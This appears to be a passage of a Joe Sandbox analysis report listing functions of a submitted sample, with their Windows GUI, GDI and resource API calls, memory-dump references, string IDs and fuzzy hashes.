                                                                • Part of subcall function 004ECCD1: GetDlgCtrlID.USER32(?), ref: 004ECCDA
                                                                • Part of subcall function 0052EB3A: __EH_prolog3.LIBCMT ref: 0052EB41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Ctrl
                                                              • String ID: %sPane-%d$%sPane-%d%x$IsFloating$MRUWidth$PinState$RecentFrameAlignment$RecentRowIndex$RectRecentDocked$RectRecentFloat
                                                              • API String ID: 3879667756-1120251949
                                                              • Opcode ID: 9725133a9437691fc65ec1a32079cf287c8b15d067012fa2bbe42ad7021a0639
                                                              • Instruction ID: 2421dcde345adc44d8b4de695e4e133f6cdc555121cd5dd55c666c7daa089fa9
                                                              • Opcode Fuzzy Hash: 9725133a9437691fc65ec1a32079cf287c8b15d067012fa2bbe42ad7021a0639
                                                              • Instruction Fuzzy Hash: 88518A31A0061AAFCF08DFA4CC99AEE7B72FF45314F00455DF9169B292DA75A904CB62
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00529550
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00529582
                                                              • GetMonitorInfoW.USER32(00000000), ref: 00529589
                                                              • CopyRect.USER32(0050B155,?), ref: 0052959B
                                                              • SystemParametersInfoW.USER32(00000030,00000000,0050B155,00000000), ref: 005295AB
                                                              • OffsetRect.USER32(?,0050B155,00000000), ref: 005295D5
                                                              • OffsetRect.USER32(?,?,00000000), ref: 00529600
                                                              • OffsetRect.USER32(?,00000000,00000000), ref: 0052962D
                                                              • OffsetRect.USER32(?,00000000,?), ref: 00529652
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Offset$InfoMonitor$CopyCursorFromParametersPointSystem
                                                              • String ID: (
                                                              • API String ID: 4030222242-3887548279
                                                              • Opcode ID: ae2578a7cb391cebdf6af7d5356afe191bf1072fbe24ac2ef3068a3ad307c498
                                                              • Instruction ID: d091c28189551a9231b049c3a7db2af527decbd194502302130abf2165e6df77
                                                              • Opcode Fuzzy Hash: ae2578a7cb391cebdf6af7d5356afe191bf1072fbe24ac2ef3068a3ad307c498
                                                              • Instruction Fuzzy Hash: 23410771B002199FDB14DFA9D984AAEFBB9FF49300F64852DE505E7280CB70AD46CB50
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 004DD6E4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID: D2D1.dll$D2D1CreateFactory$D2D1MakeRotateMatrix$DWrite.dll$DWriteCreateFactory
                                                              • API String ID: 2538663250-1403614551
                                                              • Opcode ID: d0ca7a98dd2ce125ae86b1f8500f275acc5658b9b6d2f91cb1d5433e185b5997
                                                              • Instruction ID: 4691d2bc193894f44fc3470c159c142bcf631b84dc47cc3f0284e2099e000790
                                                              • Opcode Fuzzy Hash: d0ca7a98dd2ce125ae86b1f8500f275acc5658b9b6d2f91cb1d5433e185b5997
                                                              • Instruction Fuzzy Hash: C111E735F44729BA87116F39AC85937BF5AA7C1F58321163BF119D2360D9B8C940CB54
                                                              APIs
                                                              • SetRectEmpty.USER32(?), ref: 00556AEF
                                                              • GetCursorPos.USER32(?), ref: 00556B1E
                                                              • GetParent.USER32(?), ref: 00556B86
                                                              • ReleaseCapture.USER32 ref: 00556CCA
                                                              • GetParent.USER32(?), ref: 00556CDB
                                                              • SendMessageW.USER32(?,00000363,00000000,00000000), ref: 00556CF1
                                                              • GetWindowRect.USER32(?,?), ref: 00556D36
                                                              • GetParent.USER32(?), ref: 00556E13
                                                              • InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 00556E22
                                                              • GetParent.USER32(?), ref: 00556E2B
                                                              • UpdateWindow.USER32(?), ref: 00556E36
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Parent$Rect$Window$CaptureCursorEmptyInvalidateMessageReleaseSendUpdate
                                                              • String ID:
                                                              • API String ID: 2800639987-0
                                                              • Opcode ID: 30780accac5812b08a6f006b2610b9fa2612b89147db7396c08c8a4e60b30090
                                                              • Instruction ID: eff47910b73c1183dc5237aeaf76823a511824c165aeb22673941cacb951a77d
                                                              • Opcode Fuzzy Hash: 30780accac5812b08a6f006b2610b9fa2612b89147db7396c08c8a4e60b30090
                                                              • Instruction Fuzzy Hash: F0E17C31A00255EFCB149FA5C899EAEBBB9FF48701F15406AF846DB291CB359C44CB91
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 005201BF
                                                              • ScreenToClient.USER32(?,?), ref: 005201CC
                                                              • PtInRect.USER32(?,?,?), ref: 005201FA
                                                              • PtInRect.USER32(?,?,?), ref: 0052021F
                                                              • KillTimer.USER32(?,00000002), ref: 0052024F
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 0052026D
                                                              • InvalidateRect.USER32(?,?,00000001), ref: 0052027B
                                                              • _clock.LIBCMT ref: 00520290
                                                              • KillTimer.USER32(?,00000001), ref: 00520395
                                                              • ValidateRect.USER32(?,00000000), ref: 005203B1
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000185,00000000), ref: 005203EF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$InvalidateKillTimer$ClientCursorRedrawScreenValidateWindow_clock
                                                              • String ID:
                                                              • API String ID: 3482734790-0
                                                              • Opcode ID: 9df70e3e8ba714c30a107b912842be12702e7d21547000e88fedf865b7bc37e4
                                                              • Instruction ID: 3eecc33e2e009c58f2a4c9017ec5a4e9bd8226c42dac09a609df9ec869a3ddfd
                                                              • Opcode Fuzzy Hash: 9df70e3e8ba714c30a107b912842be12702e7d21547000e88fedf865b7bc37e4
                                                              • Instruction Fuzzy Hash: 07718131501A15EFCB20DF24D988ABEBBF5FF9A300F10582EE14AD61D2DB74A941DB50
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 004DA6EE
                                                              • GetMenuItemCount.USER32(?), ref: 004DA720
                                                              • GetSubMenu.USER32(?,?), ref: 004DA764
                                                              • GetMenuState.USER32(?,?,00000400), ref: 004DA77D
                                                              • GetSubMenu.USER32(?,?), ref: 004DA7EC
                                                              • GetMenuStringW.USER32(?,?,?,00000100,00000400), ref: 004DA811
                                                              • _wcslen.LIBCMT ref: 004DA868
                                                              • AppendMenuW.USER32(00000000,00000010,00000000,?), ref: 004DA896
                                                              • GetMenuItemCount.USER32(00000000), ref: 004DA8D5
                                                              • GetMenuItemID.USER32(?,?), ref: 004DA90E
                                                              • InsertMenuW.USER32(?,?,00000000,00000000), ref: 004DA924
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString_wcslen
                                                              • String ID:
                                                              • API String ID: 881407318-0
                                                              • Opcode ID: b7ccf72034761604bc2d270d3d10dfdd7961e1043875506d73045154115fb08e
                                                              • Instruction ID: 401a85a7ea71a345f4df937c91f7c8ce967b6c02deaa12f72bad61732afab91b
                                                              • Opcode Fuzzy Hash: b7ccf72034761604bc2d270d3d10dfdd7961e1043875506d73045154115fb08e
                                                              • Instruction Fuzzy Hash: F471E171841229AFCF20AF54DC9CBE9BBB5FF18310F1041EAE509A6261CB389E94DF55
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$CaptureEmpty$CopyMessageParentSend
                                                              • String ID:
                                                              • API String ID: 3593567511-0
                                                              • Opcode ID: 57487e74a1f38a47b99c1d6fca196eaf3612562da747f8261c76cb38cf0fbf4f
                                                              • Instruction ID: 96d8ef06c1f86c09aef38141abc193d0e3321965c454f75d344d1a62140f7747
                                                              • Opcode Fuzzy Hash: 57487e74a1f38a47b99c1d6fca196eaf3612562da747f8261c76cb38cf0fbf4f
                                                              • Instruction Fuzzy Hash: 7A512776600209EFCF019FA4CC88AEE7BBAFF48301F144579F90ADA165DB759918DB60
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 0053F43D
                                                              • FindResourceW.KERNEL32(?,?,00000005,00000024,0054EE2A,?,?,?), ref: 0053F473
                                                              • LoadResource.KERNEL32(?,00000000,?,?), ref: 0053F47B
                                                                • Part of subcall function 004E9054: UnhookWindowsHookEx.USER32(?), ref: 004E9084
                                                              • LockResource.KERNEL32(?,00000024,0054EE2A,?,?,?), ref: 0053F48C
                                                              • GetDesktopWindow.USER32 ref: 0053F4BF
                                                              • IsWindowEnabled.USER32(?), ref: 0053F4CD
                                                              • EnableWindow.USER32(?,00000000), ref: 0053F4DC
                                                                • Part of subcall function 004ECD7C: IsWindowEnabled.USER32(?), ref: 004ECD85
                                                                • Part of subcall function 004ECD97: EnableWindow.USER32(?,?), ref: 004ECDA8
                                                              • EnableWindow.USER32(?,00000001), ref: 0053F5C1
                                                              • GetActiveWindow.USER32 ref: 0053F5CC
                                                              • SetActiveWindow.USER32(?,?,?), ref: 0053F5DA
                                                              • FreeResource.KERNEL32(?,?,?), ref: 0053F5F6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                                                              • String ID:
                                                              • API String ID: 964565984-0
                                                              • Opcode ID: 466d41cc379ccd93039d688ce9bb8ee309fa366aac5598861bfc79aa84265996
                                                              • Instruction ID: b165724b847f037f0edda3e4d8b147a4354b8c75c856d0487116b8e1c98eca9a
                                                              • Opcode Fuzzy Hash: 466d41cc379ccd93039d688ce9bb8ee309fa366aac5598861bfc79aa84265996
                                                              • Instruction Fuzzy Hash: 4E516D30E00605DFCF21AFA68889BBEBFB1BF44715F24013EE102A62A1DB799945DB55
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 004FB30C
                                                              • SetCursor.USER32(00000040,004FBA9B,00000000,00000000,?), ref: 004FB3A6
                                                                • Part of subcall function 004E03A2: __EH_prolog3.LIBCMT ref: 004E03A9
                                                                • Part of subcall function 004E03A2: GetDC.USER32(00000000), ref: 004E03D5
                                                                • Part of subcall function 005134C2: __EH_prolog3_GS.LIBCMT ref: 005134C9
                                                                • Part of subcall function 005134C2: CreateRectRgnIndirect.GDI32(?), ref: 00513506
                                                                • Part of subcall function 005134C2: CopyRect.USER32(?,?), ref: 0051351C
                                                                • Part of subcall function 005134C2: InflateRect.USER32(?,?,?), ref: 00513532
                                                                • Part of subcall function 005134C2: IntersectRect.USER32(?,?,?), ref: 00513540
                                                                • Part of subcall function 005134C2: CreateRectRgnIndirect.GDI32(?), ref: 0051354A
                                                                • Part of subcall function 005134C2: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0051355F
                                                                • Part of subcall function 005134C2: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 005135C7
                                                                • Part of subcall function 004E03F6: __EH_prolog3.LIBCMT ref: 004E03FD
                                                                • Part of subcall function 004E03F6: ReleaseDC.USER32(?,00000000), ref: 004E041A
                                                              • GetFocus.USER32 ref: 004FB445
                                                              • SetTimer.USER32(?,00000014,000001F4,00000000), ref: 004FB505
                                                              • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 004FB5AA
                                                              • KillTimer.USER32(?,00000014), ref: 004FB6D6
                                                              • SetTimer.USER32(?,00000014,000001F4,00000000), ref: 004FB6F3
                                                              • UpdateWindow.USER32(?), ref: 004FB712
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Create$Timer$H_prolog3H_prolog3_Indirect$CopyCursorFocusInflateIntersectKillMessageReleaseSendUpdateWindow
                                                              • String ID: <L`
                                                              • API String ID: 2399994607-3276711095
                                                              • Opcode ID: ad78a2c3ead54af9e4c40ab34f6ad04265aab1b1bb448afda172fdf982bc1f95
                                                              • Instruction ID: 155aca89ebd50ac9669979b4c4688237bd72dd1cf28d7ccf8099eb26eb23c2e9
                                                              • Opcode Fuzzy Hash: ad78a2c3ead54af9e4c40ab34f6ad04265aab1b1bb448afda172fdf982bc1f95
                                                              • Instruction Fuzzy Hash: 6CC170705006089FDF249F24C8C5BBA77A1EB45318F18427EFE199E3D6DB789844CBA9
                                                              APIs
                                                                • Part of subcall function 0054283C: GdipGetImagePixelFormat.GDIPLUS(?,00646BF4,00000000,00000000,?,00545698,00000000,00000000,00646BF4), ref: 0054284C
                                                              • _free.LIBCMT ref: 005457A1
                                                              • _free.LIBCMT ref: 005457ED
                                                              • GdipBitmapLockBits.GDIPLUS(?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00646BF4), ref: 005458B6
                                                              • _free.LIBCMT ref: 005458E6
                                                                • Part of subcall function 0054285E: GdipGetImagePaletteSize.GDIPLUS(?,00000000,00000000,00000000,?,00545752,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00542872
                                                              • GdipBitmapUnlockBits.GDIPLUS(00000005,?,?,00000000,00000001,00000000,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00646BF4), ref: 00545962
                                                              • _free.LIBCMT ref: 005459DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Gdip_free$BitmapBitsImage$FormatLockPalettePixelSizeUnlock
                                                              • String ID: &
                                                              • API String ID: 4092590016-3042966939
                                                              • Opcode ID: f961a57055eeb232bfa41b8d94d5e179c32773be3889d526fec97d0743275767
                                                              • Instruction ID: f95ccdcd49da8d10bd70bd3ff6dd72a6089ee690ad0882d1b0a4dabc53710bb5
                                                              • Opcode Fuzzy Hash: f961a57055eeb232bfa41b8d94d5e179c32773be3889d526fec97d0743275767
                                                              • Instruction Fuzzy Hash: BDA16CB1900629DBCB319B14CC85BEDBBB4BB84318F1084E9E649A7252DB349EC5CF58
                                                              APIs
                                                              • KillTimer.USER32(?,?), ref: 0053C054
                                                              • KillTimer.USER32(?,?), ref: 0053C065
                                                              • GetWindowRect.USER32(?,?), ref: 0053C083
                                                              • ShowWindow.USER32(?,00000000,00000000), ref: 0053C0F0
                                                              • ShowWindow.USER32(?,00000005,00000005,00000000), ref: 0053C13D
                                                              • BringWindowToTop.USER32(?), ref: 0053C14C
                                                              • BringWindowToTop.USER32(?), ref: 0053C154
                                                              • SetTimer.USER32(?,00000001,00000000), ref: 0053C180
                                                                • Part of subcall function 0050EC57: GetWindowRect.USER32(?,?), ref: 0050EC89
                                                                • Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$ShowTimer$BringKillRect
                                                              • String ID: c
                                                              • API String ID: 2659093394-2927717585
                                                              • Opcode ID: 17224ba0e48350d1db159078cefbf543bab41f6cd99f3d56a281187575d133e6
                                                              • Instruction ID: 3243cc45071ab99a067ef372619acf835bdbb67befb9db4b27526320600fb9b4
                                                              • Opcode Fuzzy Hash: 17224ba0e48350d1db159078cefbf543bab41f6cd99f3d56a281187575d133e6
                                                              • Instruction Fuzzy Hash: 2D815A31A00115DFCF15DFA8C8D8AAE7FB5BF49340F1544B9F94AEB266CA319940CB60
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 005401F9
                                                              • ScreenToClient.USER32(?,?), ref: 00540206
                                                              • PtInRect.USER32(?,?,?), ref: 00540219
                                                              • GetCursorPos.USER32(?), ref: 00540257
                                                              • ScreenToClient.USER32(?,?), ref: 00540264
                                                              • PtInRect.USER32(?,?,?), ref: 00540277
                                                              • InflateRect.USER32(?,?,?), ref: 00540366
                                                              • RedrawWindow.USER32(?,?,00000000,00000401), ref: 0054037D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$ClientCursorScreen$InflateRedrawWindow
                                                              • String ID: (`
                                                              • API String ID: 4131952207-4108213102
                                                              • Opcode ID: f2c9f27a9a7cfe533236108d2a049e8607ade630df39de9cb7d118c64f8614b7
                                                              • Instruction ID: d17961e6397863a4d9c30a7dff5d21bf56582b582e780b8505d77ba0be90ca68
                                                              • Opcode Fuzzy Hash: f2c9f27a9a7cfe533236108d2a049e8607ade630df39de9cb7d118c64f8614b7
                                                              • Instruction Fuzzy Hash: 5551BF31A00204EFCF11DFA5C888AED7BB9FF49308F2455AAEA09DA195DB759944CF20
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 00584FD9
                                                              • _wcslen.LIBCMT ref: 00585005
                                                              • _memset.LIBCMT ref: 00585016
                                                              • GetKeyboardLayout.USER32(00000000), ref: 0058501F
                                                              • MapVirtualKeyExW.USER32(00000000,00000000,00000000), ref: 00585028
                                                              • GetKeyNameTextW.USER32(00000000,?,00000032), ref: 0058504F
                                                              • _wcslen.LIBCMT ref: 00585059
                                                              • IsCharLowerW.USER32(00000000,?,00000000), ref: 0058508B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
